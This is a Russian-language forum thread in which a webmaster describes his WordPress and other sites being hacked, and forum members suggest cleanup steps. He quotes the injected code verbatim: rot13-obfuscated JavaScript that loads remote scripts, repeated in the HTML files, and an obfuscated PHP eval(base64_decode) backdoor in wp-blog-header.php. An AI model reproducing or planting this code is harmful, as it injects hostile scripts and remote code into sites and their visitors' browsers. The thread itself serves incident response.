Киргизский Хакер и взломы TP

Повесли мне на блоги ихнее гавно. Как избавится?


ps - TrafficRevenue.net тут не причем.

Последний раз редактировалось: X-dream (17/02/12 в 08:13), всего редактировалось 1 раз

на dreamhost мля....во всех блогах

Код: [развернуть]

<script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://jjj.genssvperirahr.arg/ybnqnq.wf?hfreanzr=vaw\"></fpevcg>\n<fpevcg fep=\"uggc://jjj.nyynop.pbz/vaqrk.cuc?ers=pbqr\"></fpevcg>"));</script>

такая хрень...

в эти файлы был добавлен такой код:

readme.html

Код: [развернуть]

<script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body>

quickstart.html

Код: [развернуть]

<script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body>

wp-blog-header.php

Код: [развернуть]

<?php ${"\x47\x4c\x4fB\x41L\x53"}["\x67\x64pj\x65\x71dn\x66o"]="\x77\x70\x5f\x64\x69d\x5f\x68ead\x65\x72";if(!isset(${${"GL\x4f\x42\x41\x4cS"}["\x67\x64\x70\x6a\x65q\x64\x6e\x66o"]})){${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x67\x64\x70\x6a\x65\x71\x64n\x66\x6f"]}=true;require_once(dirname(__FILE__)."\x2fwp-\x6c\x6fad\x2ep\x68\x70");wp();require_once(ABSPATH.WPINC."\x2f\x74\x65m\x70\x6c\x61\x74\x65\x2d\x6coa\x64e\x72\x2e\x70hp");}eval(base64_decode("JGYgP\x53\x41\x69a\x48R0\x63D\x6f\x76\x4c\x32Ny\x64i\x35\x6aYy9\x6a\x59\x79\x38\x2fYz0i\x4ci\x52fU0\x56S\x56k\x56\x53\x57\x79\x64\x53RU1PV\x45\x56fQUR\x45\x55\x69\x64\x64O\x77\x6fkY\x79\x419I\x47\x5ap\x62G\x55\x6fJ\x47Yp\x4f\x77\x70lY\x32\x68vI\x43RjWzB\x64\x4f\x77=\x3d")); ?>

вот с wp-blog-header не понятно...

так же wp-admin/tools.php изменен.
пиздец. исправляю файлы - не помогает.
вордпресс мля........сцука..надо в статику все переделывать.

в wp-blog-header.php вставил скорей всего зашифрованый ифрейм на сплойт.

так удаляю. востанавливаю оригинал, и не помогает.

По времени изменения файлы поищи, найдешь что правили.

Последний раз редактировалось: heavybit (11/02/12 в 05:37), всего редактировалось 1 раз

это не только вордпресс...... вообще суки все сайты ломанули. везде эта хрень

сменил пароль от хостинга..отменил ssh и sftp только ftp оставил...хз поможет нет.. надо все чистить...бля , все html файлы и переносить нахрен от туда на дедик.

может кто подскажет софт чтоб на сервере все файлы прочекал и этот код удалил? а то руками работы на месяц мля...

ps -хз как ломанули. из скриптов стояли только вордпрессы tp и at3 (браузер google chrom)

Последний раз редактировалось: X-dream (12/02/12 в 05:50), всего редактировалось 1 раз

Или затроянили и увели пасс, или через wp.

X-dream писал:

сменил пароль от хостинга..отменил ssh и sftp только ftp оставил...хз поможет нет.. надо все чистить...бля , все html файлы и переносить нахрен от туда на дедик.

Странные какие-то выводы, от чего должно помочь отключение ssh/sftp? Все iframer'ы через ftp работают.

похрен. я в железе не понимаю.

купил дедик за сотню с нормальным сапортом. все туда переношу уже...

всё. нах. никаких больше виртуалов vps и дримхостов.

на сервер только с моих ип заходили...

аваст бесплатный говорит все чисто

походу или вп или тп или ат3 или комп мне опять ломанули суки второй раз неделю. попробую проапгрейтить все что можно.

или сапорту это задание достанется...все почистить....пиздец 80 сайтов.

X-dream писал:

аваст бесплатный говорит все чисто

не стоит ему верить..

скорее это не вирус, просто дыра на вп есть через нее и ломанули, было похожее и у меня год назад где-то, теперь пользуюсь для защиты хитрыми редиректами если интересно стукни в аську расскажу что к чему, это просто... после того случая проблем подобных не наблюдал хотя шанс все же есть(

А вордпресс обновлялся?

Оффтопик: ога, тс себе троянов с торрентовых тайских полей наносил, а дримхост, TrafficRevenue и особенно ВП в читтерах оказались ))

бро. какие торренты. таких не знаю. никогда в жизни не юзал, еще со времен казы.

вордпрессы обновляются автоматом, плагины тоже обновленные все.

ps - пох. все к лучшему. за эти же деньги теперь сменил гавнохост на заточеный под ВП дедик с сапортом, а не с тупо мануалом.

да trafficrevenue для меня читеры - ихнии рабочии ломают и заражат сайты. а вп тут не причем. насчет дримхоста - ты там хостился хоть раз? если да то должен знать как у них память постоянно растет и какой саппорт отличный.

ps - бля , хорошо заметил вовремя. там 50 mfa с рекламой гугла.

и ваще...статика рулит.

Последний раз редактировалось: X-dream (12/02/12 в 06:55), всего редактировалось 1 раз

karbonv писал:

скорее это не вирус, просто дыра на вп есть через нее и ломанули, было похожее и у меня год назад где-то, теперь пользуюсь для защиты хитрыми редиректами если интересно стукни в аську расскажу что к чему, это просто... после того случая проблем подобных не наблюдал хотя шанс все же есть(

фаервол на сервере + 644 на темплейты - поможет? хотя именно темплейты и не тронули...

зы - сегодня завтра все переедет, стукнусь в аську

кстати чем бы комп проверить на троянов? а то опять формат придется делать ...

да чёт типа
cure IT Live CD
K Live CD
Virus Removal Tool

Братцы, а вы вообще про .ftpaccess когда-нибудь слышали?

.htaccess гдето встречал уже, а вот про это не знаю...

всё знать не возможно. я никогда железом и софтом который на сервере не заморачиваюсь ибо нихрена там не понимаю. для этого есть сапорт которому я исправно плачу уже 7 лет.

перенесут все уже сегодня я надеюсь, и почистят... закроют доступ по ip... и все будет ок.

а dreamhost - было выгодно лет 5-6 назад, галерки к хану постить с виртуала с анлим бандвич за 9 баксов в месяц.
как только они придумали VPS - можете почитать ихний форум.
я один из VPS на дримхосте полностью почистил от всего, пустой впс, перезагрузил, а он мне всеравно пишет памяти не хватает и надо добавить...

зы - а этот трафик ревенью мля... платят вроде по 3,5 за тысячу показов........... пиздец они на мне уже заработали.

реально получить с них мои деньги за рекламу? я серьёзно... нихуясе, рекламу мне повесили - пускай теперь платят!!

как наказать спонсора за то что ихнии рабочии ломают частную собственность и воруют деньги?

куда писать абузы и чем угрожать?